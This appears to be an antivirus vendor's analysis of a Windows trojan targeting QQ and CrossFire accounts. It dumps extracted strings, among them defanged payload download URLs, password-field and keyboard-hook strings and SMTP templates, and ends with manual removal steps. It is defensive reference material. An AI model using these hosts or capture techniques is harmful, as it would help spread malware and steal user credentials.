hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
hXXp://bangbang.qq.com/php/robott3nologin/servey
Referer:hXXp://bang.qq.com/actcenter/index/cf
hXXp://bang.qq.com/ugc1/getActRecommend
game=cf&mid=0&eid=5&surl=http://bangbang.qq.com/php/login?game=cf&durl=http://bang.qq.com/actcenter/index/cf?&ref=ingame01&ref=ingame01
hXXp://bang.qq.com/user/scorePersonalAcenter
Referer: hXXp://bang.qq.com/main/tradeinfo/
game=bangbang&mid=9&eid=9000&surl=http://bang.qq.com/main/tradeinfo/&durl=http://bang.qq.com/main/tradeinfo/&world=0&serviceType=2&ref=
hXXp://bang.qq.com/user/scorePersonal
hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=group_f
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc&sServiceType=dj
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=11117&sServiceDepartment=djc&set_info=djc
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=11117&iFlowId=96910&g_tk=
Referer:hXXp://daoju.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.9721381550078127
hXXp://djcapp.game.qq.com/daoju/v3/api/app/e_app/add_jf_firstlogin.php?appSource=ios&appVersion=35&sDeviceID=&p_tk=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Ftask.shtml&eas_refer=&sServiceDepartment=djc
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=35644&iFlowId=204638&g_tk=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=35644&sServiceDepartment=djc&set_info=djc
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=23314&callback=vipSignNew.signCb&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=52002&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=22249&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=23074&g_tk_type=1&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=54963&callback=vipSignNew.signCb&g_tk=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&eas_refer=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&sServiceDepartment=xinyue&sServiceType=tgclub
Referer: hXXp://xinyue.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.7271989360451698
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=21547&sServiceDepartment=xinyue&set_info=xinyue
hXXp://starvip.qq.com/fcg-bin/v2/fcg_mobile_starvip_site_checkin?g_tk=
&_=1454839692917
hXXp://x.pet.qq.com/vip_platform?cmd=set_sign_info&timer=1454839703753&callback=jQuery110205429354978259653_1454839692914&token=
msg": "
&pvsrc=102&s_p=0|http|&s_v=6.1.0.496&ozid=511022&vipid=&actid=68391&sid=&callback=json14530355412865&cache=3654
hXXp://iyouxi.vip.qq.com/ams3.0.php?g_tk=
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
hXXp://proxy.vac.qq.com/cgi-bin/srfentry.fcgi?ts=1456988761581&g_tk=
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13D15 QQ/6.2.2.402 Pixel/640 NetType/WIFI Mem/86
&_=1452520903377
hXXp://pay.video.qq.com/fcgi-bin/sign?callback=jQuery111006800204519842937_1452520903238&low_login=1&uin=
hXXp://buluo.qq.com/cgi-bin/bar/card/bar_list_by_page
hXXp://buluo.qq.com/cgi-bin/bar/user/sign
hXXp://qun.qzone.qq.com/cgi-bin/get_group_list?callbackFun=woaiwang&uin=
Referer: hXXp://qiandao.qun.qq.com/cgi-bin/sign
Host: qiandao.qun.qq.com
hXXp://qiandao.qun.qq.com/cgi-bin/sign
hXXp://qiandao.qun.qq.com/cgi-bin/new_flag
hXXp://c.pc.qq.com/fcgi-bin/signin?callback=jsonp1453084008086&_=1453084046097&mood_id=238&checkin_date=&remark=一支穿云箭千军万马来相见。
08 08 08 50
hXXp://cfzhushou.com/cfzs/help.html
hXXp://cfzhushou.com/help.html
hXXp://ip.qq.com/cgi-bin/myip
hXXps://aq.qq.com/cn2/safe_service/device_lock
aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
hXXps://ssl.captcha.qq.com/cap_union_verify_new?random=1480258509499
&pt_randsalt=0&u1=http://cf.qq.com&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-4-1457704626950&js_ver=10151&js_type=1&login_sig=&pt_uistyle=32&aid=21000124&daid=8&
hXXp://ossweb-img.qq.com/images/clientpop/act/cf/GpmHelpAct.js
http2://ossweb
hXXp://ossweb
"img":"http2(.*?).jpg"
"hXXp://(.*?)":{"~ /1~!<
hXXp://leesin.zuhaowan.com-
hXXp://leesin.zuhaowan.cn
hXXp://captcha.qq.com/getimage?aid=210001040.5721703316085041
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=41615&sServiceDepartment=group_f
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=qqgame&iActivityId=41615&sServiceDepartment=group_h&set_info=group_h
hXXp://webd.tgp.qq.com/cf/info_proxy/weapon_stat_info?&&zone_id=
1970.01.01 08:00:00
function timea(){var d,s;d=new Date();d.setTime('hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=55856&sServiceDepartment=group_f
hXXp://apps.game.qq.com/cf/a20160726hxb/getUserTask.php?action=getMyTaskList&iArea=
Referer:hXXp://cf.qq.com/act/a20160726hxb/index.htm
hXXp://apps.game.qq.com/daoju/appmarket/daoju_promotion/cloud_ticket/QueryCloudTicket.php?acctid=A100078&id=28&time=0.23177661886438727&_=1461381268102
"sMsg":"MODULE OK"
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=http%3A%2F%2Fbang.qq.com%2Fmain%2Ftradeinfo%2F&sServiceDepartment=xinyue
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=214216&g_tk=
|322|
*&checkparam=cf|yes|
&ams_checkparam=cf|yes|
sCdKey=
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=8918&sServiceDepartment=x1m1
sMsg" : "
\gzip.dll
`.data
gzip.pdb
_u%SV
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
hXXp://apps.game.qq.com/cgi-bin/cf/a20090409forceout/getinfo.cgi
hXXp://cfzhushou.com/pay.html
hXXps://ssl.ptlogin2.qq.com/ptqrshow?appid=21000124&e=2&l=M&s=4&d=72&v=4&t=0.061519597441372864&daid=8
&js_ver=10151&js_type=1&login_sig=7qKho-IT4nBHQJBVoTYw6p-IGP0hieZLRsmCy5MWU7g0bRJNRkb5q8yH7BUA7cTM&pt_uistyle=20&aid=21000124&daid=8&
hXXps://ssl.ptlogin2.qq.com/ptqrlogin?ptredirect=1&u1=http://cf.qq.com/cp/a20160223czxlx/index.htm?e_code=213709&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=6-0-
game.qq.com
hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=21000124&s_url=hXXp://apps.game.qq.com&style=34
hXXp://cf.qq.com/cfvip/
hXXp://xinyue.qq.com
{56FDF344-FD6D-11d0-958A-006097C9A090}{EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF}Report
themepassword
SysShadow.HostWnd
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}VBScript.RegExp
LocationURL
{34A715A0-6587-11D0-924A-0020AFC7AC4D}1970-01-01 00:00:00
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: image/gif, image/bmp, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
background(?:-image)?:.*?[\s]*?url[\s]*?\([#
']?(.*?)[#
onkeydown|
onkeyup|
onkeypress|
wA{0002DF05-0000-0000-C000-000000000046}{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}{6D5140C1-7436-11CE-8034-00AA006009FA}text|password|file
location.reload()
window.location.href="
{25336920-03F9-11CF-8FD0-00AA00686F13}hXXp://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js
document.all.retjs.innerText=
javascript:document.body.contentEditable='true';document.designMode='on';void 0;
javascript:document.body.contentEditable='false';document.designMode='on';void 0;
javascript:document.onsdragstart=document.onselectstart=document.oncontextmenu=function(){return true}javascript:document.onselectstart = document.oncontextmenu = document.onmousedown = document.onkeydown = function(){return true;};WarnOnHTTPSToHTTPRedirect
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
type=password
[password]
var jies = document.getElementsByTagName('object');for(var jie in jies){if(jies[jie].classid=='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000'){jies[jie].removeNode(true);}}user.qzone.qq.com
mail.qq.com
onkeyup
type='password'
type="password"
, 1, , ,
var jie = document.createStyleSheet();jie.addRule('html','').value="
document.getElementById('SysShadow.Menu
Microsoft.XMLDOM
14:00~16:00
12:00-19:00
1.2.18
%*.*f
MSWHEEL_ROLLMSG
RASAPI32.dll
MSVFW32.dll
AVIFIL32.dll
GetKeyboardState
oledlg.dll
WSOCK32.dll
InternetCanonicalizeUrlA
msscript.ocx
VVV.dywt.com.cn
USER32.DLL
\\.\Smartvsd
\\.\PhysicalDrive%d
\\.\Scsi%d:
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
(*.htm;*.html)|*.htm;*.html
its:%s::%s
(*.avi)|*.avi
WPFT532.CNV
WPFT632.CNV
EXCEL32.CNV
write32.wpc
Windows Write
mswrd632.wpc
Word for Windows 6.0
wword5.cnv
Word for Windows 5.0
mswrd832.cnv
mswrd632.cnv
Word 6.0/95 for Windows & Macintosh
html32.cnv
.PAVCOleException@@
.PAVCOleDispatchException@@
right-curly-bracket
left-curly-bracket
0123456789
c:\%original file name%.exe
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>
1.0.15.507
T%Program Files%\NamuADLook.dll
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
VVV.kubei9.com
1.3.6.1
(*.*)
1.0.0.0
6.0.2600.0 (xpclient.010817-1148)
6.0.2600.0
{557CF400-1A04-11D3-9A73-0000F81EF32E}{557CF401-1A04-11D3-9A73-0000F81EF32E}{557CF402-1A04-11D3-9A73-0000F81EF32E}{557CF405-1A04-11D3-9A73-0000F81EF32E}{557CF406-1A04-11D3-9A73-0000F81EF32E}2.6.0.0
VVV.cfzhushou.com
%original file name%.exe_1908_rwx_017A0000_00013000:
.text
`.rdata
@.data
.rsrc
@.reloc
1.2.3
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
inflate 1.2.3 Copyright 1995-2005 Mark Adler
<fd:%d>
%c%c%c%c%c%c%c%c%c%c
MSVCRT.dll
KERNEL32.dll
zlib1.dll
!"#$%&'()* ,-./012
DLL support by Alessandro Iacopetti & Gilles Vollant
TxService.exe_2924:
.text
`.rdata
@.data
.rsrc
CF_Helper.dll
wininet.dll
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
hXXp://baike2016.blog.163.com/blog/static/26993501420171281319931/
\CF_Helper.dll
@.reloc
HTTP/1.1
%Program Files%\sesvcs_%d_56089.exe
sesvcs_%d_56089.exe
hXXp://down.9udn.com/aload/as/33.txt
%Program Files%\23.txt
%Program Files%\NamuADLook.dll
hXXp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
GetProcessWindowStation
C:\Users\Administrator\Documents\Tencent Files\1148797355\FileRecv\DLL
\xxx\Helper.pdb
Helper.dll
KERNEL32.dll
ShellExecuteA
SHELL32.dll
InternetCrackUrlA
HttpQueryInfoW
WININET.dll
GetProcessHeap
GetCPInfo
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
https
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
Content-Type: application/x-www-form-urlencoded
hXXps://
hXXp://
crossfire.exe
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
user32.dll
iphlpapi.dll
SHLWAPI.dll
MPR.dll
WINMM.dll
WS2_32.dll
VERSION.dll
WinExec
GetKeyState
USER32.dll
GetViewportOrgEx
GDI32.dll
WINSPOOL.DRV
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
COMCTL32.dll
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
C:\TxService.exe
#include "l.chs\afxres.rc" // Standard components
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security></trustInfo></assembly>
T%Program Files%\NamuADLook.dll
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
VVV.kubei9.com
1.3.6.1
(*.*)
1.0.0.0
%original file name%.exe_1908_rwx_10001000_00033000:
f9z.vk
@Microsoft.XMLDOM
dwmapi.dll
Riched20.dll
Riched32.dll
{00000000-0000-0000-C000-000000000046}{34A715A0-6587-11D0-924A-0020AFC7AC4D}kernel32.dll
ole32.dll
gdiplus.dll
GdiPlus.dll
gdi32.dll
user32.dll
Advapi32.dll
advapi32.dll
User32.dll
ntdll.dll
Ole32.dll
shell32.dll
atl.dll
program internal error number is %d.
:"%s"
:"%s".
GetProcessHeap
.text
`.rdata
@.data
.rsrc
.reloc
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
TxService.exe:2924
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Program Files%\sesvcs_963_56089.exe (503 bytes)
%Program Files%\23.txt (27530 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KEZ8B515.txt (112 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\01[1].txt (24010 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\NamuADLook[1].dll (16650 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\26993501420171281319931[1].htm (45330 bytes)
C:\CF_Helper.dll (202 bytes)
%Program Files%\NamuADLook.dll (20518 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\33[1].txt (40 bytes)
C:\TxService.exe (1670 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\20D65GOU.txt (91 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\2672760322016102115848934[1].htm (97343 bytes)
C:\exdui.dll (53 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.